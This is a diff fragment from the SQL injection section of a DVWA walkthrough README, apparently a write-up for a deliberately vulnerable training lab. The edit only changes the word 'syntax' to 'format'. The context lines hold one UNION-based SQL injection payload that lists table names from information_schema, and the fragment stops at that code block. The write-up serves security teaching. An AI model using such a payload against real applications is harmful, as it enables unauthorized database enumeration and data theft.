Abdy01/DVWA-Walkthrough/SQL-Injection/README.md

 </p>

 Now we can enumerate the tables, the columns and extract the values.
-For the next queries I changed the syntax a little bit.
+For the next queries I changed the format a little bit.

 ```sql
 1' UNION SELECT null,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'dvwa'#